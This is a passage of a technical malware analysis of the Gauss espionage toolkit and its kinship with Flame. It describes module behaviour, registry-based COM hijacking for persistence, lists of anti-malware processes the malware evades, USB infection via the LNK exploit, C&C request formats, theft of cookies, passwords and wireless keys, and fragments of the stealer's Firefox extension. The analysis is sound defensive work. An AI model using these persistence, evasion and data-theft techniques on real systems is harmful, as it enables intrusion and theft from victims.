    We created a special detection routine which helped us to discover various Gauss configurations based on registry settings on infected machines. We detected about 1700 such configurations in total, which revealed a picture of modules propagation:

    Module "Number of PC with the module (defined in config) "
    UsbDir 1655
    Godel 1220
    Gauss 858
    Gauss_1.1 510
    Kurt (aka Godel) 433
    Gauss 1.0.8 318
    Tailor 28
    McDomain 1.2 5
    Cosmos 5
    Lagrange 3

    You can see three main modules, which are used in most cases - Gauss, Godel and UsbDir. Some examples of different configs:


    As mentioned above, we have been unable to discover the original infection vector and the dropper file that installs Gauss in the system. In all the systems we have studied, we dealt with a set of modules that was already installed. It is possible that during initial infection, only the ShellHW component is installed, which then installs the other modules.

     

    ShellHW (file name 'wmiqry32.dll'/'wmihlp32.dll') is the main component of the malware which ensures that all other Gauss modules are loaded when the malware starts and operate correctly.

    Comparison with Flame

    As we mentioned above, there are significant similarities in code and architecture between Gauss and Flame. In fact, it is largely due to these similarities that Gauss was discovered. We created the following table for a clearer understanding of these facts and proof of 'kinship' between the two attack platforms:

    Feature Flame Gauss
    Modular architecture Yes Yes
    Using kernel drivers No No
    .OCX files extensions Yes Yes
    Configuration settings Predefined in main body Stored in registry
    DLL injections Yes Yes
    Visual C++ Yes Yes
    Encryption methods XOR XOR
    Using USB as storage Yes (hub001.dat) Yes (.thumbs.db)
    Embedded LUA scripting Yes No
    Browser history/cookies stealer Yes (soapr32/nteps32) Yes (winshell)
    CVE2010-2568 (.LNK exploit) Yes (target.lnk) Yes (target.lnk)
    C&C communication https https
    Log files/stolen data stored in %temp% Yes Yes
    Zlib compression of collected data Yes Yes

    In addition to the features listed above, there are considerable similarities in the operation of the Flame and Gauss C&C servers. The relevant analysis is provided in the C&C Communication section.

    There are more similarities in the code and data of the modules:

    • C++ runtime type information (RTTI) structures are encoded to hide the names of the standard library classes. The same encoded names can be found in both Flame and Gauss modules, i.e. the first RTTI structure contains a name 'AVnxsys_uwip' that most likely belongs to the 'AVtype_info' class.


    • Most of Flame and Gauss modules contain dozens of object initialization functions that construct string objects from encrypted data. The layout of these functions is almost identical.

       

    • String decryption routines ('GetDecryptedStrings' used in initialization functions) are very similar, although not identical, because the layout of the structures holding encrypted strings was changed.

       

    Wmiqry32/Wmihlp32.dll aka ShellHW

    Installed by: Unknown dropper

    Operates in two modes: installation and normal operation.

    File names "%system32%\wbem\wmiqry32.dll
    %system32%\wbem\wmihlp32.dll "
    Some known MD5 "C3B8AD4ECA93114947C777B19D3C6059 08D7DDB11E16B86544E0C3E677A60E10 055AE6B8070DF0B3521D78E1B8D2FCE4 FA54A8D31E1434539FBB9A412F4D32FF 01567CA73862056304BB87CBF797B899 23D956C297C67D94F591FCB574D9325F"
    Image Size 258 048 bytes
    Number of resources 7
    Resources 121, 131, 141, 151, 161, 171, 181
    Date of compilation "Jun 1 2011
    Jul 16 2011
    Jul 18 2011
    Sep 28 2011
    Oct 20 2011 "
    Related files "%temp%\~shw.tmp
    %temp%\~stm.tmp "

    Installation

    The module checks if it was loaded by 'lsass.exe' process and, if true, proceeds with the installation.

    It writes itself in files: %system32%\wbem\wmiqry32.dll, %system32%\wbem\wmihlp32.dll and modifies the system registry to be loaded instead of %system32%\wbem\wbemsvc.dll file.

    To achieve this, it writes the following registry value:

    [HKCR\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32]
    Default = %system32%\wbem\wmihlp32.dll

    Operation

    The module is automatically loaded into processes that use wbemsvc.dll. When loaded in 'svchost.exe' that was started with '-k netsvc' parameter, it starts its main thread.

    The module creates 'ShellHWStop', 'Global\ShellHWDetectionEvent' events, mutex 'ShellHWDetectionMutex'.
    The main thread exits if the following processes were found at its start:

    LMon.exe sagui.exe RDTask.exe kpf4gui.exe
    ALsvc.exe pxagent.exe fsma32.exe licwiz.exe
    SavService.exe prevxcsi.exe alertwall.exe livehelp.exe
    SAVAdminService.exe csi-eui.exe mpf.exe lookout.exe
    savprogress.exe lpfw.exe mpfcm.exe emlproui.exe
    savmain.exe outpost.exe fameh32.exe emlproxy.exe
    savcleanup.exe filemon.exe AntiHook.exe endtaskpro.exe
    savcli.exe procmon.exe xfilter.exe netguardlite.exe
    backgroundscanclient.exe Sniffer.exe scfservice.exe oasclnt.exe
    sdcservice.exe acs.exe scfmanager.exe omnitray.exe
    sdcdevconx.exe aupdrun.exe spywaretermin
    atorshield.exe
    onlinent.exe
    sdcdevconIA.exe sppfw.exe spywat~1.exe opf.exe
    sdcdevcon.exe spfirewallsvc.exe ssupdate.exe pctavsvc.exe
    configuresav.exe fwsrv.exe terminet.exe pctav.exe
    alupdate.exe opfsvc.exe tscutynt.exe pcviper.exe
    InstLsp.exe uwcdsvr.exe umxtray.exe persfw.exe
    CMain.exe dfw.exe updclient.exe pgaccount.exe
    CavAUD.exe ipatrol.exe webwall.exe privatefirewall3.exe
    CavEmSrv.exe pcipprev.exe winroute.exe protect.exe
    Cavmr.exe prifw.exe apvxdwin.exe rtt_crc_service.exe
    Cavvl.exe tzpfw.exe as3pf.exe schedulerdaemon.exe
    CavApp.exe privatefirewall3.exe avas.exe sdtrayapp.exe
    CavCons.exe pfft.exe avcom.exe siteadv.exe
    CavMud.exe armorwall.exe avkproxy.exe sndsrvc.exe
    CavUMAS.exe app_firewall.exe avkservice.exe snsmcon.exe
    UUpd.exe blackd.exe avktray.exe snsupd.exe
    cavasm.exe blackice.exe avkwctrl.exe procguard.exe
    CavSub.exe umxagent.exe avmgma.exe DCSUserProt.exe
    CavUserUpd.exe kpf4ss.exe avtask.exe avkwctl.exe
    CavQ.exe tppfdmn.exe aws.exe firewall.exe
    Cavoar.exe blinksvc.exe bgctl.exe THGuard.exe
    CEmRep.exe sp_rsser.exe bgnt.exe spybotsd.exe
    OnAccessInstaller.exe op_mon.exe bootsafe.exe xauth_service.exe
    SoftAct.exe cmdagent.exe bullguard.exe xfilter.exe
    CavSn.exe VCATCH.EXE cdas2.exe zlh.exe
    Packetizer.exe SpyHunter3.exe cmgrdian.exe adoronsfirewall.exe
    Packetyzer.exe wwasher.exe configmgr.exe scfservice.exe
    zanda.exe authfw.exe cpd.exe scfmanager.exe
    zerospywarele.exe dvpapi.exe espwatch.exe dltray.exe
    zerospywarelite_installer.exe clamd.exe fgui.exe dlservice.exe
    Wireshark.exe sab_wab.exe filedeleter.exe ashwebsv.exe
    tshark.exe SUPERAntiSpyware.exe firewall.exe ashdisp.exe
    rawshark.exe vdtask.exe firewall2004.exe ashmaisv.exe
    Ethereal.exe asr.exe firewallgui.exe ashserv.exe
    Tethereal.exe NetguardLite.exe gateway.exe aswupdsv.exe
    Windump.exe nstzerospywarelite.exe hpf_.exe avastui.exe
    Tcpdump.exe cdinstx.exe iface.exe avastsvc.exe
    Netcap.exe cdas17.exe invent.exe  
    Netmon.exe fsrt.exe ipcserver.exe  
    CV.exe VSDesktop.exe ipctray.exe  

    The module reads the registry value 'SOFTWARE\Microsoft\Windows\CurrentVersion\Reliability' 'TimeStampForUI'. It is an encrypted configuration file. The configuration file contains the list of additional modules, their names, DLL exports names to call and location of the modules' additional files.

     

    Gauss ShellNotifyUser ShellNotifyUserEx SetWindowEvent InitShellEx %systemroot%\system32\winshell.ocx %temp%\ws1bin.dat Godel InitCache RevertCache ValidateEntry CreateEntry %windir%\system32\dskapi.ocx %temp%\~gdl.tmp UsbDir InitCache RevertCache ValidateEntry CreateEntry %windir%\system32\smdk.ocx %temp%\~mdk.tmp 

    String values from config file (example)

    Every module is loaded and its export functions are called as specified in the configuration. Most of the actions are logged in an encrypted (with XOR) file '%temp%\~shw.tmp'.


    Sample of decrypted '~shw.tmp'

    After loading additional modules, it tries to acquire the same privileges as 'explorer.exe' and then starts its C&C interaction loop.

    Prior to communicating with the C&C, all the information from the other modules' log files is copied to the ~shw.tmp file. Paths to the log files are taken from the TimeStampForUI configuration file.

    As a result, at this stage ~shw.tmp becomes a universal container file containing all the stolen data.

    It checks Internet connection (https) by accessing URLs specified in its resource 161.


    It then checks an https connection with www.google.com or www.update.windows.com. If '200 OK' is received in reply, it sends a request with the proxy server parameters taken from the prefs.js file of the Mozilla Firefox browser.

    When an Internet connection is available, it connects to its C&C servers that are specified in resource 131:


    Connection is established using WinInet API and is performed in two stages:

    1. GET request to the server. The response from the server is expected to contain new modules, commands or configuration data.
      GET [C&C domain]/userhome.php?sid=[random  string]==&uid=VfHx8fHx8fHx8fHx8fHx8fHx8fE=
    2. POST request to the server with the contents of the file '~shw.tmp' that contains all data collected from the infected computer.

       

    The response from the server is decrypted using XOR and 0xACDC as the key. Exfiltrated data is compressed with Zlib.

     

    The C&C connection routine is controlled by a DWORD value that is read from the registry value:

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Reliability] ShutdownIntervalSnapshotUI

    The initial value of the counter is read from resource 181 and is equal to 56. The counter is decremented every time the module fails to connect to its C&C server or to the servers specified in resource 161 and it is reset to the initial value after every successful connection to the C&C server. The module exits the C&C connection loop when the value of the counter becomes equal to zero.

    Resource Description
    121 3 DWORDs, related to list of AVs
    131 Hostnames and URLs of C&C servers
    141 List of AVs, firewalls, etc.
    151 Additional configuration DWORDs
    161 Hostnames and URLs of legitimate sites to check Internet connection
    171 String with cryptic identifiers
    181 DWORD, number of attempts to connect to the C&C before giving up

    File Version:    2001.12.4414.320 Product Version: 5.1.2600.5788 File OS:         WINDOWS32 File Type:       DLL File SubType:    UNKNOWN Language/Code Page: 1033/1200 CompanyName:        Microsoft Corporation FileDescription:    WMI COM Helper FileVersion:        2001.12.4414.320 LegalCopyright:     Copyright (C) Microsoft Corp. 1995-1999 LegalTrademarks:    Microsoft(R) is a registered trademark of Microsoft 
    Corporation. Windows(TM) is a trademark of Microsoft Corporation ProductName: WMI COM Services Help ProductVersion: 05.01.2600.5788

    Version info 'wmiqry32.dll'

    Dskapi.ocx

    Name of the module used in Gauss: 'Godel' or 'Kurt'.

    File names %system32%\dskapi.ocx
    Some known MD5 "ED5559B0C554055380D75C1D7F9C4424 E379270F53BA148D333134011AA3600C EF83394D9600F6D2808E0E99B5F932CA"
    Image Size "1 327 104 bytes
    954 368 bytes
    962 560 bytes
    417 792 bytes "
    Number of resources 2
    Resources 100, 101
    Date of compilation "28.09.2011
    13.10.2011
    01.11.2011
    29.11.2011 "
    Related files "%temp%\~gdl.tmp
    .thumbs.db
    wabdat.dat
    desktop.ini
    target.lnk
    System32.dat
    System32.bin
    .CatRoot.tmp "

    Creates events: '{12258790-A76B}', 'Global\RasSrvReady'

    All functionality is implemented in 'RevertCache' export. The module starts its main thread and then returns. The main thread waits for the '{12258790-A76B}' event and continuously checks for the presence of anti-malware software.

    'ValidateEntry' signals the '{12258790-A76B}' event, allowing for the main thread to work for 3 seconds before terminating it.

    Writes log file: %temp%\~gdl.tmp

    The log file entries are compressed with Zlib.

    Reads registry key HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum Checks for running anti-malware products by names and exits if they are present:

    AVKProxy.exe

    AVKService.exe

    AVKTray.exe

    AVKWCtl.exe

    GDFirewallTray.exe

    GDFwSvc.exe

    GDScan.exe

    abcd.exe

    avp.exe

    fameh32.exe

    fch32.exe

    fsar32.exe

    fsav32.exe

    fsdfwd.exe

    fsgk32.exe

    fsgk32st.exe

    fsguidll.exe

    fshdll32.exe

    fsm32.exe

    fsma32.exe

    fsmb32.exe

    fsorsp.exe

    fspc.exe

    fsqh.exe

    fssm32.exe

    fsus.exe

    gsava.exe

    gssm32.exe

    vsmon.exe

    zapro.exe

    zlclient.exe

    It also exits if started on Windows 7 SP 1.

    By querying disk enum in registry, it also tries to identify whether the storage is USB-connected or not by searching 'USBSTOR' string in their information.

    When a drive contains '.thumbs.db' file, its contents are read and checked for the valid magic number 0xEB397F2B. If it matches, the module creates %commonprogramfiles%\system\wabdat.dat and writes the data to this file, and then deletes '.thumbs.db'.

    Then, it infects the USB drives by creating directories with the names .Backup0[D-M] and .Backup00[D-M]


    Infected USB root folder (before activation)

    Each directory contains a specially crafted desktop.ini file and target.lnk file that exploits the LNK vulnerability.

     
    target.lnk

    [.ShellClassInfo]
    CLSID = {0AFACED1-E828-11D1-9187-B532F1E9575D}
    CLSID2 = {0AFACED1-E828-11D1-9187-B532F1E9575D}
    UICLSID = {0AFACED1-E828-11D1-9187-B532F1E9575D}

    desktop.ini


    Listing of .Backup0* directory

    In the root directory of the drive it creates files 'System32.dat' and 'System32.bin', the payload DLLs, and the '.thumbs.db' file. The payloads are stored as resources and encrypted with a simple XOR routine.



     static int  decrypt(uint8_t *data, unsigned int dataLen) {         uint32_t acc = 0xCC;         for  (unsigned int  i = 0; i < dataLen; i++ )         {                 uint8_t acc2 = data[i];                 data[i] ^= acc;                 acc = acc2;         }         return  0; } 


    Resource File name Description
    100 System32.dat (.CatRoot.tmp) 32-bit payload
    101 System32.bin (.CatRoot.tmp) 64-bit payload

    USB Payload

    Both 32-bit and 64-bit DLLs implement the same functionality. When loaded using the LNK vulnerability, they start a main thread and return. The main thread copies the payload to %TEMP% directory and loads itself again. When loaded from %TEMP%, it creates a mutex 'Isvp4003ltrEvent', patches the 'NtQueryDirectoryFile' function in ntdll.dll so that it hides its files and then sends the 'F5' key event to windows of classes 'SysListView32', 'SysTreeView32', 'DirectUIHWND', causing Explorer directory listings to refresh. This hides the files. It also waits for the event 'Global\RasSrvReady'.

    Then, it retrieves the following data from the system:

    • Version of the Windows OS
    • Workstation info
    • Network adapter information
    • Routing table
    • Process list
    • Environment variables and disk information
    • List of visible network shares
    • Network proxy information
    • List of visible MS SQL servers
    • URL cache

    All this information is encoded and appended to the file '.thumbs.db' on the infected storage. This file also contains a TTL (time to live) value that is decremented by 1 each time the payload starts from the infected storage. When this counter becomes equal to zero, the payload disinfects the media by removing '.Backup0*' directories and 'System32.dat' and 'System32.bin' files, leaving '.thumbs.db' file with collected information. Known value of the TTL value is '30.'

    There are several 'special' versions of the payload. They contain additional PE sections with names '.exsdat,' '.exrdat,' and '.exdat'. These sections are encrypted with RC4. The encryption key is derived from an MD5 hash performed 10000 times on a combination of '%PATH%' environment string and name of the directory in %PROGRAMFILES%.

    The RC4 key is not yet known, neither is the contents of these sections. The payload also contains a binary resource 100 that is also encrypted.

    .thumbs.db file

    This is a container for data stolen by the 'dskapi' payload.

    Offset Data
    0 Magic number : 0xEB397F2B
    4 TTL counter
    : Encoded data

    The encoded data consists of arrays of encoded strings, separated by a magic value 0xFF875686.

    Offset Description
    0 Magic number :
    0xFF875686 - end of array of records, must search for the next Magic
    0xFF875683 XOR ( recordLength + 5 ) - start of record
    4 Encrypted string data, recordLength bytes

    Every record is encrypted by a simple algorithm using the character's position and record length and can be decrypted with the following code:



     for  (unsigned int  j = 0; j < recordLen; j++ )                         {                                 ptr[i + j] ^= recordLen;                                 ptr[i + j] -= j;                         } 


    File Version:    5.1.3700.0 Product Version: 5.1.3700.0 File OS:         NT (WINDOWS32) File Type:       DRV File SubType:    DRV SOUND File Date:       00:00:00  00/00/0000 Language/Code Page: 1033/1200 CompanyName:        Microsoft Corporation FileDescription:    Disk Helper FileVersion:        5.1.3700.0 InternalName:       dskapi.ocx LegalCopyright:     ¿ Microsoft Corporation. All rights reserved. OriginalFilename:   dskapi.ocx ProductName:        MicrosoftR WindowsR Operating System ProductVersion:     5.1.3700.0

    Version info 'dskapi.ocx'

    Smdk.ocx

    Name of the module used in Gauss: 'UsbDir'

    File names %system32%\smdk.ocx
    Some known MD5 "5604A86CE596A239DD5B232AE32E02C6
    90F5C45420C295C73067AF44028CE0DD"
    Image Size 212 992 bytes
    Date of compilation "27.09.2011
    17.10.2011"
    Related files %temp%\~mdk.tmp

    Creates events: '{B336C220-B158}', 'Global\SmSrvReady'
    All functionality is implemented in 'RevertCache' export. The module starts its main thread and then returns. The main thread waits for the '{B336C220-B158}' event and continuously checks for the presence of anti-malware software.

    'ValidateEntry' signals the '{B336C220-B158}' event, allowing for the disk enumeration routine to start.

    Writes log file: %temp%\~mdk.tmp
    Reads registry key HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum

    Checks for running antimalware products by names and exits if they are present:

    AVKProxy.exe

    AVKService.exe

    AVKTray.exe

    AVKWCtl.exe

    GDFirewallTray.exe

    GDFwSvc.exe

    GDScan.exe

    abcd.exe

    avp.exe

    fameh32.exe

    fch32.exe

    fsar32.exe

    fsav32.exe

    fsdfwd.exe

    fsgk32.exe

    fsgk32st.exe

    fsguidll.exe

    fshdll32.exe

    fsm32.exe

    fsma32.exe

    fsmb32.exe

    fsorsp.exe

    fspc.exe

    fsqh.exe

    fssm32.exe

    fsus.exe

    gsava.exe

    gssm32.exe

    The version of the module built on 27.09.2011 also exits if started on Windows 7 SP 1.

    By querying disk enum in registry, it also tries to identify whether the storage is USB-connected or not by searching 'USBSTOR' string in their information.

    The log file entries are compressed with Zlib.

    File Version:    5.1.3700.0 Product Version: 5.1.3700.0 File OS:         NT (WINDOWS32) File Type:       DRV File SubType:    DRV SOUND File Date:       00:00:00  00/00/0000 Language/Code Page: 1033/1200 CompanyName:        Microsoft Corporation FileDescription:    Disk Helper FileVersion:        5.1.3700.0 InternalName:       dskapi.ocx LegalCopyright:     ¿ Microsoft Corporation. All rights reserved. OriginalFilename:   dskapi.ocx ProductName:        MicrosoftR WindowsR Operating System ProductVersion:     5.1.3700.0

    Version info 'smdk.ocx' (the same as in dskapi.ocx)

    McDmn.ocx

    Name of the module used in Gauss: 'McDomain'

    File names %system32%\mcdmn.ocx
    known MD5 9CA4A49135BCCDB09931CF0DBE25B5A9
    Image Size 102 400 bytes
    Date of compilation 16.09.2011
    Related files %temp%\md.bak

    This module is a Windows DLL file with one exported function called 'DllRegisterServer.'

     

    It creates log file: %temp%\md.bak that is encrypted with 2-byte XOR.

    Uses LsaQueryInformationPolicy to retrieve the name of the primary domain. Retrieves information about network adapters. All this information is encrypted and stored in the log file.

    File Version:    2001.12.4414.320 Product Version: 5.1.2600.5788 File OS:         WINDOWS32 File Type:       DLL File SubType:    UNKNOWN File Date:       00:00:00  00/00/0000 Language/Code Page: 1033/1200 CompanyName:        Microsoft Corporation FileDescription:    Windows File Extension FileVersion:        2001.12.4414.320 LegalCopyright:     Copyright (C) Microsoft Corp. 1995-1999 LegalTrademarks:    Microsoft(R) is a registered trademark of Microsoft 
    Corporation. Windows(TM) is a trademark of Microsoft Corporation ProductName: MicrosoftR WindowsR Operating System ProductVersion: 05.01.2600.5788

    Version info 'mcdmn.ocx'

    Lanhlp32.ocx

    Name of the module used in Gauss: 'Tailor'

    File names %system32%\lanhlp32.ocx
    Known MD5 ED2B439708F204666370337AF2A9E18F
    Image Size 278 528 bytes
    Date of compilation 26.10.2011
    Related files %systemroot%\Temp\s61cs3.dat

    The module is a Windows DLL file with one exported function called 'DllRegisterServer.'

    It contains encrypted debug information that includes the location of the project, 'd:\projects\tailor\':

    d:\projects\tailor\utils\Exceptions.h ..\Utils\Buffer.cpp ..\Utils\CryptUtils.cpp ..\Utils\Event.cpp ..\Utils\EveryoneSecurityAttributes.cpp ..\Utils\File.cpp ..\Utils\Mutex.cpp ..\Utils\MyWlanApi.cpp ..\Utils\OsUtils.cpp ..\Utils\RemoteMemoryBuffer.cpp ..\Utils\Storage.cpp ..\Utils\StringUtils.cpp ..\Utils\Waiter.cpp .\SavedWNetworkConnectionsWin5.cpp .\SavedWNetworkConnectionsWin6.cpp .\VisibleNetworks.cpp

    Creates mutex : Global\EnvDBE

    Creates log file: %systemroot%\Temp\s61cs3.dat

    Operates on Windows XP, Windows Vista and Windows 7.

    On Windows XP:
    .\SavedWNetworkConnectionsWin5.cpp
    Enumerates registry keys in HKLM\SOFTWARE\Microsoft\WZCSVC\Parameters\Interfaces\
    Extracts 'Static#' values that contain wireless key data.

    On Windows Vista and Windows 7 :
    ..\Utils\MyWlanApi.cpp
    .\SavedWNetworkConnectionsWin6.cpp
    .\VisibleNetworks.cpp

    Uses extended wlanapi.dll API to access WLAN information. Enumerates available wireless interfaces, then enumerates all profiles and extracts SSID, name and wireless key information. Then, it retrieves the list of wireless networks visible to all the wireless interfaces.

    The log file is encrypted with a simple 1-byte XOR.

    File Version:    5.1.3700.0 Product Version: 5.1.3700.0 File OS:         NT (WINDOWS32) File Type:       DRV File SubType:    DRV SOUND File Date:       00:00:00  00/00/0000 Language/Code Page: 1033/1200 CompanyName:        Microsoft Corporation FileDescription:    Microsoft Windows LAN Component FileVersion:        5.1.3700.0 InternalName:       lanhlp32.ocx LegalCopyright:     ¿ Microsoft Corporation. All rights reserved. OriginalFilename:   lanhlp32.ocx ProductName:        MicrosoftR WindowsR Operating System ProductVersion:     5.1.3700.0

    Version info 'lanhlp32.ocx'

    Devwiz.ocx

    Name of the module used in Gauss: 'Cosmos'

    File names %system32%\devwiz.ocx
    Known MD5 CBB982032AED60B133225A2715D94458
    Image Size 102 400 bytes
    Date of compilation 19.03.2012
    Related files %temp%\~ZM6AD3.tmp

    The module is a Windows DLL file with one exported function called 'RefreshDev.'

    It creates log file : %WINDIR%\temp\~ZM6AD3.tmp

    The log file is not encrypted and starts with a magic number 0xF68B973D

    The module collects the following information and writes it to the log file :

    • CMOS RAM contents
    • Registry keys :

      [ HKLM\HARDWARE\DESCRIPTION\System ]
      SystemBiosVersion, SystemBiosDate

      [ HARDWARE\DESCRIPTION\System\BIOS ]
      BIOSVendor, BIOSVersion, BIOSReleaseDate, BaseBoardManufacturer, BaseBoardProduct,
      BaseBoardVersion, SystemFamily, SystemManufacturer, SystemProductName, SystemSKU,
      SystemVersion

    All retrieved information is written to the log file.

    File Version:    5.1.2600.0 Product Version: 5.1.2600.0 File OS:         NT (WINDOWS32) File Type:       DRV File SubType:    DRV SOUND File Date:       00:00:00  00/00/0000 Language/Code Page: 1033/1200 CompanyName:        Microsoft Corporation FileDescription:    Windows Device Wizard FileVersion:        5.1.2600.0 InternalName:       devwiz.ocx LegalCopyright:     ¿ Microsoft Corporation. All rights reserved. OriginalFilename:   devwiz.ocx ProductName:        MicrosoftR WindowsR Operating System ProductVersion:     5.1.2600.0

    Version info 'devwiz.ocx'

    Winshell.ocx

    Name of the module used in Gauss: 'Gauss'

    File names %system32%\winshell.ocx
    Some known MD5 "EF6451FDE3751F698B49C8D4975A58B5
    7AC2799B5337B4BE54E5D5B03B214572
    4FB4D2EB303160C5F419CEC2E9F57850 "
    Image Size "405 504 (August 2011)
    417 792 (October 2011)
    401 408 (Dec 2011 - Jan 2012) "
    Number of resources 6
    Resources 121,122,123,124,125,126
    Date of compilation "08.08.2011
    03.10.2011
    14.12.2011
    05.01.2012 "
    Related files "%temp%\ws1bin.dat
    browser.js
    browser.xul
    fileio.js
    chrome.manifest
    lppd.dat
    install.rdf
    rssf.dat
    lfm.dat
    mppd.dat
    pddp.dat "

    Creates events: 'Global\SrvReportCondition', 'Global\DhwSyncEvent', 'Global\ShellSync'

    Interestingly, all three variants of the module that we have analyzed contain information about the location and names of the original projects:

    Variant Path to project files
    August 2011 d:\projects\gauss
    October 2011 d:\projects\gauss_for_macis_2
    Dec 2011-Jan 2012 c:\documents and settings\flamer\desktop\gauss_white_1

    Contains encrypted debug information that includes the location and files of the project:

    c:\documents and settings\flamer\desktop\gauss_white_1\utils\Exceptions.h .\main.cpp .\Manager.cpp c:\documents and settings\flamer\desktop\gauss_white_1\utils\SmartPtr.h .\Injector.cpp c:\documents and settings\flamer\desktop\gauss_white_1
    \gauss\../Utils/ComUtils.h .\History.cpp .\FirefoxPluginInstaller.cpp .\Telemetry.cpp .\Storage.cpp .\OsUtils.cpp .\ProcessSnapshot.cpp .\Event.cpp .\GaussThread.cpp .\Buffer.cpp .\RemoteMemoryBuffer.cpp .\File.cpp .\Mutex.cpp .\Waiter.cpp .\EveryoneSecurityAttributes.cpp .\Catcher.cpp .\BrowserConnector.cpp c:\documents and settings\flamer\desktop\gauss_white_1
    \minime\../Utils/SmartPtr.h .\Assigner.cpp .\IEAbstractElements.cpp .\FormExtractor.cpp .\COMAbstractDataTypes.cpp

    The debug information which was accidentally forgotten by the developers provides some interesting details. For instance, the Windows username which compiled the project can be seen in the strings above as 'flamer'.

    DllMain starts a thread only if loaded by 'explorer.exe'.

    Writes log file: %systemroot%\Temp\ws1bin.dat. Log file starts with magic number 0x0A86FD375, encrypted with 1-byte XOR 0x46. Log file writer is guarded by mutex 'Global\ShellSyncCom'.

    Reads registry key : SOFTWARE\Microsoft\Windows\CurrentVersion\Reliability ShutdownInterval = binary data

    Checks Windows version and, onWindows Vista and Windows 7, it accesses %SystemDrive%\Users. On earlier versions, it uses %SystemDrive%\Documents and settings and gets list of directories there.

    Export 'InitShellEx' : Enumerates all entries in HKEY_USERS, removes all entries in SOFTWARE\Mozilla\Mozilla\Firefox for each user, searches for its log ws1bin.dat and removes it.

    Export 'SetWindowEvent' : set event 'Global\DhwSyncEvent', wait for other thread to exit in 20 seconds, then terminate that thread.

    Export 'ShellNotifyUser' : returns 1

    Export 'ShellNotifyUserEx' : main export. Starts its main thread that should be monitored by the event 'SetWindowEvent' and returns.

    Lists running processes and returns if 'evil.exe' is running. Additionally logs the presence of the following registry keys : 'HKLM\SOFTWARE\KasperskyLab\AVP6', 'HKLM\SOFTWARE\KasperskyLab\protected\AVP7'

    Then it starts a loop searching for running instances of %systemroot%\explorer.exe. If found, it injects %systemroot%\system32\winshell.ocx (own body) into that process.

    It uses an interesting technique to inject itself into Explorer: it creates a remote thread with the address of 'LoadLibraryW' API as its start address. The path to its ocx file is passed to the function as 'lpParameter'.

    Telemetry: It retrieves and logs the following:

    • Computer name
    • Windows OS version
    • List of running processes
    • List of directories in %PROGRAMFILES%
    • Version of Internet Explorer browser
    • Primary domain name
    • Network adapter information

    Searches for Cookies directory, retrieves all cookie files and writes their contents into its log. Searches for cookies that contain the following strings:

    paypal

    mastercard

    eurocard

    visa

    americanexpress

    bankofbeirut

    eblf

    blombank

    byblosbank

    citibank

    fransabank

    yahoo

    creditlibanais

    amazon

    facebook

    gmail

    hotmail

    ebay

    maktoob

    Then, it retrieves Internet Explorer browsing history using IUrlHistoryStg::EnumUrls function, and tries to extract password and text fields from loaded pages.

    The Firefox plugin is written in several files, all of them are extracted and decrypted from the resources of the module.

    Resource Id File name of the Firefox Plugin component
    121 browser.js
    122 browser.xul
    123 fileio.js
    124 chrome.manifest
    125 lppd.dat
    126 install.rdf

     

    Appends Firefox configuration file 'prefs.js' with the following string, disabling Firefox 'select your add-ons' window that is usually shown after each Firefox update:

    user_pref("extensions.shownSelectionUI", true);

    Installs the Firefox extension, on Windows Vista and Windows 7 into AppData\Roaming\Mozilla\Firefox\Profiles, on earlier versions into Application Data\Mozilla\Firefox\Profiles. All files are written in a directory named '{a288cad4-7b24-43f8-9f4d-8e156305a8bc}'.

    The Firefox extension extracts the following data:

    • Browsing history
    • Passwords (saved and entered by the user)
    • Cookies. The extension can be configured to look only for cookies of Google, Hotmail, Facebook, Yahoo
    const Cc = Components.classes; const Ci = Components.interfaces; const EXTENSION_ID = "{a288cad4-7b24-43f8-9f4d-8e156305a8bc}"; const EXTENSION_PATH = DirIO.get("ProfD").path+"\\extensions\\"+EXTENSION_ID; const QUERY_ID = 'YlU/X1gFa2Isb1YkcFMnP18u`1kkb1goYFUOakAgY1ULa1EjYlU/X1gPXWMyc18xY
    GM0b1UxalEsYVYgX1Uha18qdVEna18lYWQi`Dgob2QubmklYWQi`DEjYGIkb2Mv
    XWMyc18xYFwoclUl`WgPblUlb/oSY18uY1wk`FkjYT8tRV4ocFYkcFMnPVwrP18
    u`1kkb2gublk/'; const EXTENSION_URL = "about:addons"; const EXTENSION_XUL = "chrome://mozapps/content/extensions/extensions.xul"; const ERROR_FILE = "rssf.dat"; const LOG_FILE = "lfm.dat"; const OUTPUT_FILE = "mppd.dat"; const VERSION_FILE = "lddp.dat"; const MAX_FILE_SIZE = Math.pow(2,20)*10; const MEAN_ROW_SIZE = 100; const MAX_ROW_COUNT = (1/3)*(MAX_FILE_SIZE/MEAN_ROW_SIZE);

    Part of browser.js code

    The Firefox extension writes several log files in its directory:

    Log file name Description
    rssf.dat Browsing history
    lfm.dat Log file
    mppd.dat Collected passwords
    pddp.dat Collected cookies

     
    File Version:    5.1.3700.0 Product Version: 5.1.3700.0 File OS:         NT (WINDOWS32) File Type:       DRV File SubType:    DRV SOUND File Date:       00:00:00  00/00/0000 Language/Code Page: 1033/1200 CompanyName:        Microsoft Corporation FileDescription:    Microsoft Windows Shell Component FileVersion:        5.1.3700.0 InternalName:       winshell.ocx LegalCopyright:     ¿ Microsoft Corporation. All rights reserved. OriginalFilename:   winshell.ocx ProductName:        MicrosoftR WindowsR Operating System ProductVersion:     5.1.3700.0

    Version info 'winshell.ocx'

    Windig.ocx

    Name of the module used in Gauss: 'Lagrange'

    File names %system32%\windig.ocx
    Known MD5 DE2D0D6C340C75EB415F726338835125
    Image Size 180224 bytes
    Date of compilation 15.07.2011
    Related files Fonts\ pldnrfn.ttf

    The module is a Windows DLL file with one exported function called 'GlobalDeleteAtomL.'\
    The module reads the registry key that is originally created by 'ShellHW' module :

    HKLM\ SOFTWARE\Microsoft\Windows\CurrentVersion\Reliability
    ShutdownInterval = binary data

    If the value is not present in the registry, it writes a random value into that key.

    Then, it creates a new TrueType font file '%SystemRoot%\fonts\pldnrfn.ttf' (62 668 bytes long) from a template and using randomized data from the ShutdownInterval key. The creation time of the font file is set to the creation time of the Arial font, %SystemRoot%\fonts\ARIAL.TTF.

    Then, a custom font named 'Palida Narrow' is registered in the system font storage using the 'AddFontResourceW' API function. The module also creates a registry value:

    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts
    Palida Narrow (TrueType)=pldnrfn.ttf

    The purpose of the addition of this font is not yet known. It appears to contain valid Western, Baltic and Turkish symbols.

     
    Font information from Font Viewer

